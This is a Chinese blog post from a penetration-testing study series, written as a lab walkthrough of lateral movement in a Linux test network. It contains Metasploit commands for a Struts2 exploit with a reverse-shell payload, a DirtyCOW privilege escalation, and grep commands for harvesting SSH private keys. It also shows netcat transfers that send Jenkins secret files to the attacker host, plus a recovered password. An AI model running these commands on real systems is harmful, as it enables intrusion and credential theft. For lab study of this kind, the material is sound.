第137天:横向移动-Linux_ssh工具杂项&Linux靶场环境搭建
实验环境及图解:通过网盘分享的文件:137-Linux内网环境镜像文件
链接: https://pan.baidu.com/s/1W_5DvhbkGYMqML4mi1rjQA?pwd=ad6r 提取码: ad6r
https://i-blog.csdnimg.cn/direct/08d9748067434ca7ad8b739084dbfc63.png
一般情况下SSH密钥存放在~/.ssh/目录下,也可以文件中搜刮已保存的SSH凭据
~/.ssh/config
~/.ssh/known_hosts
~/.bash_history
文件中搜刮已经保存的ssh
grep -ir "BEGIN RSA PRIVATE KEY" /*
grep -ir "BEGIN DSA PRIVATE KEY" /*
grep -ir "BEGIN OPENSSH PRIVATE KEY" /*
nmap信息收集ip以及开放端口
https://i-blog.csdnimg.cn/direct/edbeb64843384a398addb5f50792b9b4.png
别的两台主机做了限制,没办法访问
80端口页面
https://i-blog.csdnimg.cn/direct/96e405d5aba6401893da583fc5fef05e.png
8080端口页面
https://i-blog.csdnimg.cn/direct/4633beb0713c4a4aafee77e729b34d28.png
80页面中有版本,opencms 10.5.3只有一个xxe漏洞
https://i-blog.csdnimg.cn/direct/f02920a54a2c425586184cbb1d121571.png
下面另有一个页面有漏洞/struts2-showcase/show-action,但是我也不知道这是怎么来的目录扫描也扫不到(没这个字典)
https://i-blog.csdnimg.cn/direct/78e06d91e7a74d14a800700bd2bfc018.png
https://i-blog.csdnimg.cn/direct/1342f2f307a64ec4b23bfd768e0ae44c.png
msf使用strust工具
use exploit/multi/http/struts2_content_type_ognl
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 172.16.250.10
set lhost 172.16.250.128
set rport 80
run
https://i-blog.csdnimg.cn/direct/41c855389ed049929ce459158dfaa7d0.png
检察目前得到的权限
https://i-blog.csdnimg.cn/direct/fab7b65944de4583a73ad0de6076d261.png
上传les.sh文件GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
https://i-blog.csdnimg.cn/direct/05f89456c9684c258fe36196c96e89a6.png加执行权限,执行
https://i-blog.csdnimg.cn/direct/de1b4e4777e54ba883f8ca16d4cca455.png
扫描出来脏牛漏洞
https://i-blog.csdnimg.cn/direct/ef7e79d4a90d4c039b31db802b45651d.png
这里使用dirty漏洞进行提权,这篇文章复现过一次
第103天: 权限提升-Linux 系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID_103-linux提升-内核&suid&辅助&环境&exp等-CSDN博客
下载这个c文件到本地
https://i-blog.csdnimg.cn/direct/7fa245e80041422791eab31238c9c753.png
编译,并且加权限执行
gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread #编译
python3 -c "import pty;pty.spawn('/bin/bash')" #开启python子bash,脏牛漏洞得使用该bash去反弹shell
chmod +x ./dirtycow-mem
./dirtycow-mem
https://i-blog.csdnimg.cn/direct/4eaffd0089244b928807b2554a4323ac.png
https://i-blog.csdnimg.cn/direct/26df2b2584434ee0b34d7997ab23b4f8.png
这个执行完成后要包管系统稳定,需要执行下面的两条命令,速度要快,不然系统会崩溃,以是就是该漏洞要谨慎去使用
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn
https://i-blog.csdnimg.cn/direct/d574e2a5e4a042729a7d98de4db8665b.png
确保稳定性
https://i-blog.csdnimg.cn/direct/97455452b4104bfb8688c51b677ec56e.png
检察数据库设置文件,发现这里是站库分离
cat /opt/tomcat/webapps/kittens/WEB-INF/config/opencms.properties https://i-blog.csdnimg.cn/direct/bf7dadadd26e45e49a4551c2962e9c7a.png
检察历史,发现使用了这个rsa去连接过30的root用户,以是要把这个文件保存在本地root目录下
https://i-blog.csdnimg.cn/direct/5d206ea84c6f4267ad79ded6f1473f9e.png
把id_rsa复制到本地,使用
cp /root/.ssh/id_rsa /tmp/id_rsa
chmod 777 id_rsa #需要赋予权限才可以下载
download /tmp/id_rsa /root/id_rsa
chmod 777 id_rsa #恢复原来的权限,否则需要输入root密码
ssh -i id_rsa root@172.16.250.30
https://i-blog.csdnimg.cn/direct/3cc3e6719f71431385f2e0a2b02213ec.png 复制到本地
https://i-blog.csdnimg.cn/direct/8b0f2434f8cc4914b9be944b6a810ac5.png
这里这个文件需要复制到本地root用户目录下去执行,因为我本来登录的时候是kali,以是只能复制到tmp下然后移动到/root目录下
https://i-blog.csdnimg.cn/direct/2344cbbe81de41fcbf128766f2129526.png 信息收集
https://i-blog.csdnimg.cn/direct/bbc3a46358434b2f916029ed68e8b6e1.png
检察端口
https://i-blog.csdnimg.cn/direct/502a80b4bc62449783973e8f2567107b.png
正常访问是访问不了的,通过第一张图片了解到8080端口需要通过10主机去访问,设置sockets代理去访问
https://i-blog.csdnimg.cn/direct/e30eebea819743b4a54b597e813c9d8e.png
起首需要添加路由
https://i-blog.csdnimg.cn/direct/c8377bac2695428490a053591f357052.png
设置代理
use auxiliary/server/socks_proxy
set version 5
run https://i-blog.csdnimg.cn/direct/77658cf05f6649ddb01004aade8e70e1.png
https://i-blog.csdnimg.cn/direct/0e7eff8ed9494c33bdec9c3c2766dd1e.png
https://i-blog.csdnimg.cn/direct/e69eaed73aa74a08baf714aa43df695e.png这里有个扩充知识点
https://i-blog.csdnimg.cn/direct/25deada9fb5b4d7782ef3236803e2648.png
注意这里:
dynamic_chain:下方代理节点有一条测试精确也可以使用
strict_chain:如果下方设置了多个节点,必须都测试精确才可以使用
先测试可以或许访问
https://i-blog.csdnimg.cn/direct/9d43117283eb4836b5ef998afcd42fd6.png欣赏器要访问的话需要设置代理
https://i-blog.csdnimg.cn/direct/0a73fbad94ab46ae8f242128417c4b45.png
tomcat9.0.7版本相对安全
https://i-blog.csdnimg.cn/direct/0780a7216d8445ffb5a4c2894fd3d108.png
/jenkins页面
https://i-blog.csdnimg.cn/direct/02c25eb2ae234a1fb2926cad2e51ff6e.png内里有一个根据页面
https://i-blog.csdnimg.cn/direct/22066e5ec7ce4067816bce102393f298.png
使用nc把jenkins的相关密码文件传送过来,因为这里是30只让10访问,以是只能反向传输
kali
nc -lvp 1234 > master.key
nc -lvp 1234 > hudson.util.Secret
nc -lvp 1234 > credentials.xml
30主机
nc 172.16.250.128 1234 < /home/jenkins/secrets/master.key
nc 172.16.250.128 1234 < /home/jenkins/secrets/hudson.util.Secret
nc 172.16.250.128 1234 < /home/jenkins/credentials.xml
https://i-blog.csdnimg.cn/direct/c6452b1f122745f1bc932e4e84c5f1e0.png
其他两个文件也是同样的方式传输
使用python脚本破解,这里python不能使用太高的版本
GitHub - cheetz/jenkins-decrypt: Credentials dumper for Jenkins
python decrypt.py master.key hudson.util.Secret credentials.xml https://i-blog.csdnimg.cn/direct/73bb3b043d1b46e99d59df6dc7dca18a.png
密码为: )uDvra{4UL^;r?*h
连接
https://i-blog.csdnimg.cn/direct/2920853624354bfdb2f4d1e516ee66b0.png
这里其实我照旧不太理解不是别的IP不让访问ssh嘛,为啥可以直接连接
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]